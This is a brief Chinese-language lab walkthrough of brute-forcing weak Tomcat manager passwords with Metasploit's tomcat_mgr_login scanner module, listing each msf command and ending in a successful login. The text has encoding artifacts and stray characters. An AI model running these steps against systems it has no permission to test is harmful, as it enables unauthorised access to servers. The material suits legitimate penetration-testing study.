測試環(huán)境:
Apache Tomcat/8.5.41
利用kali 里面的msf 進(jìn)行爆破弱口令
運(yùn)行命令查找關(guān)于 tomcat 的輔助模塊? msf5 > search tomcat
找到需要的功能模塊 auxiliary/scanner/http/tomcat_mgr_login
進(jìn)入模塊 use? auxiliary/scanner/http/tomcat_mgr_login??
開始配置 IP地址踏志,端口號
set RHOSTS? ip???????????? set RPORT? 端口號
配置完成執(zhí)行命令? show options? 查看有沒有IP 端口有沒有配置正確
執(zhí)行命令 run? 開始爆破
成功爆破登錄